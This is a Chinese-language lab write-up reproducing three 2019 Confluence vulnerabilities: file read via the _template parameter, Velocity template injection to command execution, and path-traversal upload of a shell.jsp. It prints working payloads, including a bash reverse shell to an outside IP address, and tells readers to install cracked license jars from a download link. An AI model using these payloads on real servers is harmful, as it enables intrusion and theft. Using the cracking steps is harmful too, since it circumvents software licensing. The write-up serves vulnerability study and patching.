Confluence 漏洞总结-jarrott-漏洞文库小世界-安全文库-NGC660 安全实验室

Confluence 漏洞总结-jarrott

###Confluence 漏洞总结-jarrott

 

Confluence 漏洞总结

1.漏洞描述

Confluence是款企业知识库软件。
其中Confluence Server和Data Center产品中使用的小工具连接器widgetconnecter组件(版本<=3.1.3)中存在任意文件读取,命令执行等。

2.漏洞编号

CVE-2019-3394
CVE-2019-3396
CVE-2019-3398

3.影响版本

2.0.0 <= version < 6.6.13
6.7.0 <= version < 6.12.4
6.13.0 <= version < 6.13.4
6.14.0 <= version < 6.14.3
6.15.0 <= version < 6.15.2

4.环境搭建

confluence版本6.3.4
mysql版本5.7
首先使用docker搭建mysql
docker pull mysql:5.7
1592982681923-1a4e5dca-da17-44b4-a41a-cd018e515117

docker images
1592982682084-c7776c08-272e-4603-9b1a-0ff9538586c2

docker run –name mysql5.7 -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 -d mysql:5.7

1592982682201-a470c041-8af6-49db-8b76-a35e9b591dc8

查看mysql是否运行
sudo netstat -tap | grep mysql
1592982682326-df3f3799-d2a8-4abf-92ec-71f23be31733

数据库已正常运行,使用工具连接,创建confluence数据库
1592982682508-73b15fff-affb-46ae-b09e-7e6ea96419fd

安装配置完数据库开始安装confluence6.3.4
wget https://www.atlassian.com/software/confluence/downloads/binary/atlassian-confluence-6.3.4-x64.bin

1592982682639-7c9d6b0f-9017-47f0-9226-e93f8485f188

对atlassian-confluence-6.3.4-x64.bin文件进行赋权
chmod +x atlassian-confluence-6.3.4-x64.bin
执行./atlassian-confluence-6.3.4-x64.bin

根据提示依次选择 o 1 i
1592982682863-1b299b69-ad66-41ad-a515-4488dcc1adf2

安装完成后先不要启动confluence

下载系统破解程序及链接mysql的jar包
链接:https://pan.baidu.com/s/1cYkqja5GiHtvOX_8DlhuRw 提取码:3eej

1592982682988-11d06e11-fd2f-41c7-8570-885574f4db76

将三个文件放在/home/ubuntu/Desktop/confiuence目录下

在路径/opt/atlassian/confluence/confluence/WEB-INF/lib下更换atlassian-extras-decoder-v2-3.2.jar文件(将原文件做一下备份)
1592982683125-7f533d46-d8bc-498f-8d51-2a8e22dc6983

在路径/opt/atlassian/confluence/confluence/WEB-INF/atlassian-bundled-plugins下更换atlassian-universal-plugin-manager-plugin-2.22.jar文件
1592982683265-e6b493b8-5aee-4bd4-ad1c-72bcf6d05cd6

把数据库链接文件mysql-connector-java-5.0.8-bin.jar放在/opt/atlassian/confluence/lib路径下
1592982683406-f763e325-f512-4712-afa4-8c4eef76bf87

启动confluence
sudo service confluence start
1592982683538-5cb289f5-674f-46a2-8d17-2c6df2528a35

访问url:8090
1592982683670-c866738b-cdc9-4b98-82b9-2316221d0101

1592982683812-9861086a-55b7-4cee-9f5d-81364a7ddaca

这里不需要选择直接下一步

1592982683943-daf03fba-d3ef-4627-9956-71042c4d1abf

1592982684066-0f2d6c44-8ffc-47aa-b941-dd9eb1580ee9

1592982684206-16e4c0c0-dc9b-4a4e-9588-19dbf0506f2f

1592982684383-b5ed21ad-7aa2-4958-a766-fcf24f9bbf0a

1592982684633-06824fbe-97ba-4da7-b25f-f899af76dfae

1592982684786-45c71a56-6ea2-4e3e-8854-ef56b3d080ee

1592982684888-f25299e2-5d27-42cb-9c62-e1398b1f3407

1592982685299-5e4d2440-8324-4e01-aeb6-6b538ebed257

1592982685461-b5882007-7405-446d-a9ab-11b9dbb005d7

5.漏洞复现

5.3.CVE-2019-3394

在文本编辑处插入图片,如图
1592982685612-ce6da03c-cfe2-4744-ba13-de6af2f644cd

插入后,点击发布更新,拦截数据包修改上传连接,将此部分去掉
1592982685819-192e67f1-2ba9-46fe-8c1d-6fc4071ad8b6

1592982685952-53575b87-b673-4678-9d41-d8e76976f269

看到图片已上传,使用导出word功能,可读取web.xml文档
1592982686077-82a89662-9c7e-4e4b-be53-fb8b35ecf563

 

5.2.CVE-2019-3396

点击创建选择其他宏,小工具连接器组件,输入上传地址,点击预览。
1592982686240-674307cc-5d03-49e5-b50b-fe8fe698594c

1592982686561-3cd27673-f82c-40aa-bd48-81523c1f2b1a

1592982686750-97c2606e-6508-4f07-9af6-0b8557c23147

抓取数据包,可以发现这个位置没有_template参数,这里应该是通过白盒代码审计发现的漏洞
1592982686912-b3df6eeb-a153-4182-af25-c2b3a7a0e284

把_template参数添加上进行执行任意文件读取
1592982687052-3d77c3bc-941a-40bd-a2d9-7ccb3062a965

读取/etc/passwd
1592982687208-f1620665-d932-4bd8-b686-ac7ad9e6ed80

命令执行语法
执行计算机
#set($e=“e”) $e.getClass().forName(“java.lang.Runtime”).getMethod(“getRuntime”,null).invoke(null,null).exec(“/usr/bin/gnome-calculator”)
nc反弹shell
#set($e=“e”) $e.getClass().forName(“java.lang.Runtime”).getMethod(“getRuntime”,null).invoke(null,null).exec(“bash -i >& /dev/tcp/149.129.68.7956888 0>&1”)

1592982687348-711773b2-1b25-485a-9be5-79151dc72451

1592982687537-c6a66412-b5b3-4a3a-94f7-2383aec9cbd7

5.3.CVE-2019-3398

/var/atlassian/application-data/confluence#
在文件上传位置,选择上传脚本
1592982687692-2f0495f3-1f2b-4bac-9bee-dd2f59da0313

上传过程通过修改filename,来进行上传路径修改,这里上传成功。
1592982687865-fb2e5715-9c31-4dfc-aca3-55d4cba593e7

在附件全部下载
1592982687998-2ca613b7-ef9e-4c0f-a2c3-3c7f2c6d50c2

抓取链接可以看到上图两个文件。
1592982688131-4ad99284-85f9-442b-a1ab-7120b4bb5d75

登录服务器查看文件全部放在zip压缩包中
1592982688279-bdd83dea-0ae7-48f9-b81e-121e99062aa7

之前使用了../../向上跳了两级目录,可以看到shell.jsp在上两级目录中
1592982688421-0f92f0bd-4b24-4e51-910f-6244c8a92c1e

 

 

6.漏洞修复

漏洞修复版本为
6.6.13
6.12.4
6.13.4
6.14.3
6.15.2

7.参考链接

https://blog.csdn.net/caiqiiqi/article/details/89034761 https://nosec.org/home/detail/2461.html https://www.amm907.com/index.php/archives/118/ https://www.pythonheidong.com/blog/article/304926/ https://blog.csdn.net/weixin_44058342/article/details/100519971

请登录后发表评论

    请登录后查看回复内容